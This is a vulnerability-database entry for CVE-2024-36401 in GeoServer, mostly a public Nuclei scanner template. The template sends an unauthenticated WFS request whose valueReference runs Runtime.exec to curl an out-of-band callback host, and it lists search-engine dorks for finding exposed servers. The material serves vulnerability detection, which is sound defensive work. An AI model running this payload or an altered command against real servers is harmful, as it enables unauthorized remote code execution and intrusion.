CVE-2024-36401: GeoServer RCE in Evaluating Property Name Expressions

日期: 2025-08-01 | 影响软件: GeoServer | POC: 已公开

漏洞描述

In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.

PoC代码[已公开]

id: CVE-2024-36401

info:
  name: GeoServer RCE in Evaluating Property Name Expressions
  author: DhiyaneshDk,ryanborum
  severity: critical
  description: |
    In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
  impact: |
    This vulnerability can lead to executing arbitrary code.
  reference:
    - https://x.com/sirifu4k1/status/1808270303275241607
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36401
    - https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
    - https://github.com/advisories/GHSA-6jj6-gm7p-fcvv
  classification:
    epss-score: 0.94425
    epss-percentile: 0.9998
  metadata:
    verified: true
    max-request: 1
    vendor: osgeo
    product: geoserver
    shodan-query: "Server: GeoHttpServer"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
    google-query: intitle:"geoserver"
  tags: cve,cve2024,geoserver,rce,unauth,kev,vkev

flow: |
   if(http(1))
   {
   set("name",template.typename[0])
   http(2)
   }

http:
  - raw:
      - |
        GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    extractors:
      - type: regex
        name: typename
        part: body
        group: 1
        regex:
          - typeName=([^&\]]+)
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: content_type
        words:
          - "application/xml"
# digest: 4b0a00483046022100d9a3cbf6793e6a58573c7ddb096f871b19aa0e468eebacdc0b510dc1d43996b8022100b850dda3609fdfcd3c2c1b1219680979db5846df77265135ed1b8a408ab184c7:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-36401.yaml

相关漏洞推荐